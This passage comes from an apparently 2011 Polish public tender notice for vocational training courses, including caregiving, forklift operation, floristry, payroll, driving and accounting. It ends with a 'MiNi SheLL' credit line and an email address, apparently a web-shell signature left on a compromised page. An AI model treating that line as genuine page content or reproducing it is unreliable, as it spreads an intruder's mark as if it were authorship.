<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Organizacja i przeprowadzenie kursu dwumodułowego - Kurs dwumodułowy - opiekunka osób starszych, niepełnosprawnych i dzieci.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursu dwumodułowego - Kurs dwumodułowy - opiekunka osób starszych, niepełnosprawnych i dzieci (badania lekarskie + wykłady + praktyka w co najmniej dwóch miejscach + egzamin końcowy): 

A. I moduł - Kurs opiekunki osób starszych, niepełnosprawnych i dzieci dla 11 osób, który powinien odbyć się w ciągu min. 140 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
- zajęcia teoretyczne:
-podstawy gerontologii i informacji na temat osób niepełnosprawnych,
-podstawy psychologii, w tym komunikacja i mediacje,
-zachowanie osób chorych z wybranymi schorzeniami; choroby Parkinsona, Alzhaimera, demencje starcze, zaburzenia psychiczne,
-podstawy higieny i pielęgnacji,
-podstawy rehabilitacji i aktywizacji, 
-opieka w domu pacjenta,
-metodyka organizacji czasu wolnego dla osób starszych i niepełnosprawnych,
-elementy fizjologii i patologii wieku dziecięcego, 
-zasady pielęgnacji dzieci,
-zasady aktywizacji dzieci - gry i zabawy,
-ustalanie warunków pracy z pracodawcą oraz współpracy z podopiecznym i jego rodziną,
-nowe przepisy dot. opieki nad dziećmi w wieku do lat 3,
-zasady udzielania pierwszej pomocy przedmedycznej,
-higiena żywienia - diety,
-przepisy bhp i ppoż.
- zajęcia praktyczne w odpowiednich placówkach.

B.  II moduł - Kurs masażu klasycznego dla 11 osób który powinien odbyć się w ciągu min. 50 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
a)anatomia człowieka,
b)wprowadzenie do masażu - zagadnienia teoretyczne obejmujące:
- techniki masażu i ich oddziaływanie,
- wskazania i przeciwwskazania do masażu,
- wpływ masażu na organizm człowieka,
- metodyka stosowania masażu,
- techniki masażu.
c)część praktyczna I (masaż poszczególnych części ciała):
- masaż kończyny górnej, 
- kończyny dolnej,
- masaż grzbietu,
- kręgosłupa,
- karku i obręczy barkowej,
- klatki piersiowej,
- powłok brzusznych.
d)część praktyczna II:
- masaż całego ciała.
UWAGA! Kurs A i B do przeprowadzenia przez jednego Wykonawcę. Uczestnikami modułu I i II będą te same osoby/uczestnicy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Organizacja i przeprowadzenie kursu dwumodułowego - Kurs dwumodułowy - magazynier.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> A.I moduł - Kurs magazyniera(badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 5 osób, które powinno odbyć się w ciągu min. 120 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
- organizacja prac magazynowych,
- technologie prac magazynowych,
- wiadomości z zakresu obrotu magazynowego,
- zabezpieczenie towarów,
- minimum sanitarne,
- przepisy bhp i ppoż,
- obsługa kas fiskalnych,
- obsługa programu Subiekt,
B.II moduł - Organizacja i przeprowadzenie Kursu operatora wózka widłowego wszystkich typów (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 5 osób, które winno odbyć się w ciągu min. 67 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
- zajęcia teoretyczne (m.in.):
typy wózków jezdniowych, 
budowa i zasady działania wózków jezdniowych różnych typów pozwalające na ich prawidłową eksploatację, 
czynności operatora przy obsłudze wózków przed podjęciem pracy i po pracy wózkami,
czynności operatora w czasie pracy wózkami, 
warunki towaroznawstwa, 
wiadomości z bhp i wybrane przepisy ruchu drogowego, 
bezpieczna wymiana butli gazowych w wózkach jezdniowych, 
wiadomości o dozorze technicznym.
- zajęcia praktyczne.
UWAGA! Kurs A i B do przeprowadzenia przez jednego Wykonawcę. Uczestnikami modułów będą te same osoby/uczestnicy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Organizacja i przeprowadzenie kursu Kurs - bukieciarz florysta.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursu Kurs - bukieciarz florysta (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 2 osób, które winno odbyć się w ciągu min. 100 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych (teoretycznych i praktycznych):
- anatomia i fizjologia roślin,
- asortyment roślin ozdobnych,
- narzędzia i środki techniczne, w tym sposoby utrwalania materiału roślinnego,
- podstawowe zasady wykonywania kompozycji,
- florystyka ślubna,
- florystyka żałobna,
- florystyka okolicznościowa,
- kompozycje z roślin suchych i preparowanych,
- obsługa kas fiskalnych,
- obsługa terminala kart płatniczych,
- przepisy bhp i ppoż..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Organizacja i przeprowadzenie kursu Kurs - kadry, płace i obsługa biura.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursu Kurs - kadry, płace i obsługa biura (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 3 osób powinno odbyć się w ciągu min. 120 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
- wybrane zagadnienia z prawa pracy, cywilnego i postępowania administracyjnego,
- dokumentacja kadrowa,
- czynności związane z zatrudnianiem pracowników,
- zasady urlopowe,
- czas pracy,
- dokumentacja płacowa; lista płac, karty wynagrodzeń;
- zasad naliczania płac, rozliczanie z ZUS i US,
- świadczenia na rzecz pracowników z ubezpieczenia społecznego,
- fundusz pracy i gwarantowanych świadczeń pracowniczych
- obsługa programów kadrowych, m.in. PŁATNIK, REWIZOR, SIGID LUB PERSON, PORTAL SPRAWOZDAWCZY GUS,
- organizacja biura i prowadzenie dokumentacji,
- wykorzystywanie pakietu Office w pracach biurowych,
- autoprezentacja,
- zasady i przepisy BHP w biurze firmy..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Organizacja i przeprowadzenie kursu Kurs prawa jazdy kat. B.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursu Kurs prawa jazdy kat. B (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 10 osób powinno odbyć się w ciągu min. 60  godzin zegarowych i składać się z następujących bloków tematycznych:
- szkolenie teoretyczne,
- szkolenie praktyczne. 
UWAGA! Na cenę kursu składać się będą: badania lekarskie, nauka jazdy, koszty egzaminu teoretycznego i praktycznego,  w tym jeden poprawkowy praktyczny..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Organizacja i przeprowadzenie kursu Kurs - profesjonalny sprzedawca.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursu Kurs - profesjonalny sprzedawca (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 11 osób powinno odbyć się w ciągu min. 120 godzin lekcyjnych (45 minut każda) i składać się z następujących bloków tematycznych:
-podstawowe pojęcia ekonomiczne,
-instrumenty marketingu,
-fakturowanie,
-psychologia sprzedaży,
-kultura obsługi klienta,
-podstawy obsługi komputera,
-program Subiekt,
-obsługa kas fiskalnych,
-obsługa terminala kas fiskalnych,
-minimum sanitarne,
-przepisy bhp i ppoż..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Organizacja i przeprowadzenie kursu Kurs malowania i szpachlowania.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursu Kurs malowania i szpachlowania (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 1 osoby powinno odbyć się w ciągu min. 130 godzin, w tym 20 godzin teoretycznych i 110 godzin praktycznych (45 minut każda) i składać się z następujących bloków tematycznych (teoretycznego i praktycznego):
-organizacji stanowiska pracy, 
-materiałoznawstwo, 
-przygotowanie powierzchni do malowania i szpachlowania oraz metod aplikacji, technologii prac malarskich i kładzenia gładzi szpachlowej,
-przechowywanie farb i materiałów malarskich, odpadów i ochrony środowiska,
-przepisy BHP i ppoż,
-zajęć praktycznych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Organizacja i przeprowadzenie kursu Kurs - samodzielny księgowy bilansista.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Organizacja i przeprowadzenie kursu Kurs - samodzielny księgowy bilansista (badania lekarskie + wykłady + praktyka + egzamin końcowy) - dla 3 osób powinno odbyć się w ciągu min. 160 godzin lekcyjnych (45 minut każda).
Kurs składać się powinien z następujących bloków tematycznych:
1. Aktualne zagadnienia obejmujące wiedzę i umiejętności praktyczne z zakresu księgowości, w tym:
- ogólne zasady rachunkowości, 
- krajowe i zagraniczne środki pieniężne, kredyty bankowe i inne krótkoterminowe aktywa finansowe,
klasyfikacja i ewidencja rozrachunków:
- z odbiorcami i dostawcami krajowymi i zagranicznymi,
- publiczno - prawne ( z budżetem, ZUS, Urzędem Celnym, itp.),
- z pracownikami z tytułu wynagrodzeń,
- pozostałe rozrachunki,
- materiały i towary (rozliczenie zakupu),- aktywa trwałe (rzeczowe i finansowe, inwestycje długoterminowe, leasing),
- koszty podstawowej działalności operacyjnej (rozliczenia międzyokresowe, kalkulacja jednostkowa),
- wyroby gotowe,
- przychody ze sprzedaży i koszty ich uzyskania,
- przychody i koszty finansowe,
- zyski i straty nadzwyczajne,
- kapitały, rezerwy, rozliczenia międzyokresowe przychodów,
- ustalanie wyniku finansowego (wynik podatkowy, rezerwy i aktywa z tytułu odroczonego podatku dochodowego),
- naliczanie podatków i ZUS - sporządzanie deklaracji,
- konstrukcja i zasady sporządzania bilansu oraz rachunku zysków i strat,
- sprawozdania finansowe.
2. Obsługa komputera w pracy samodzielnego księgowego, w tym: 
- obsługa komputera w zakresie podstawowym (środowisko Windows, Pakiet Microsoft Office, Internet); 
- arkusze kalkulacyjne w zastosowaniach finansowo-księgowych; 
- obsługa programów placowych i programów komputerowych finansowo-księgowych (minimum dwa programy finansowo-księgowe i jeden program placowy - często stosowane przez firmy z sektora MSP oraz jednostki budżetowe) oraz obsługa programu Płatnik.

3. Zajęcia praktyczne na zasadzie firmy symulacyjnej prowadzone przez instruktorów - specjalistów w danej dziedzinie.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2011.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com